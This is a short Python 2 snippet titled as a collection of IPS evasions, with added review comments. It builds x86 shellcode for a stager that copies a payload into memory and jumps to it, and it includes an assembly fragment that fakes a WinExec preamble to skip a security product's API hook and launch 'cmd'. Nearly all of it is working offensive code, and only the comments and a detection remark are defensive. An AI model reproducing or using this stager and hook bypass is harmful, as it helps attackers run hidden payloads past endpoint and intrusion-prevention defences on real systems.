collection of various IPS evasions
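# ---------------------------------------------------------------------------
# Stager stub: builds raw 32-bit x86 machine code as a Python 2 byte-string.
# `scode` (the payload bytes) and the `struct` module are assumed to be
# defined/imported earlier in the file -- neither is visible in this excerpt.
#
# Python 2 only: on Python 3 the str literals below and the bytes returned by
# struct.pack() cannot be concatenated (TypeError); b"" literals would be needed.
#
# The rendered page had gutter residue (" | |") glued to the end of every
# line, which made the first statement a syntax error; it is stripped here.
#
# Detection note: the immediates for len(scode) and offset change with every
# payload, whereas the 7-byte FS:[0x30] read is constant across builds.
# ---------------------------------------------------------------------------
offset = 0x1000 - len(scode) - 32                        # displacement added to EDI below; depends on payload length
tls_header  = "\xE8\x00\x00\x00\x00"                      # CALL $+5
tls_header += "\x5E"                                      # POP ESI
tls_header += "\x83\xC6\x1B"                              # ADD ESI, 0x1b
# NOTE(review): 0x1b == 27 == bytes from the POP ESI through the RETN, so ESI
# ends up just past this stub -- presumably where `scode` is appended; the
# constant must be updated if the stub length changes.  Verify against caller.
tls_header += "\xB9" + struct.pack("<L", len(scode))      # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00"              # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset)      # ADD EDI, offset
tls_header += "\x57"                                      # PUSH EDI
tls_header += "\xFC"                                      # CLD
tls_header += "\xF3\xA4"                                  # REP MOVSB [EDI], [ESI]
tls_header += "\xC3"                                      # RETN
# Second snippet, kept by the author as a bare triple-quoted string: it is
# evaluated and discarded at runtime, so it has no effect on `tls_header`.
"""
another:
pop ebx ; Real return address
push 0x00220000 ; Address of push ebp/call ebp after a call.
push ebx ; Final return to the real return address
push 0xbadc0de2 ; Junk to align stack for pop ebp
push [ebp+0x4] ; Pointer to 'cmd\0'
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER
push ebp ; WinExec preable
mov ebp, esp
sub esp, 0x54 ; end WinExec preable
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6)
"""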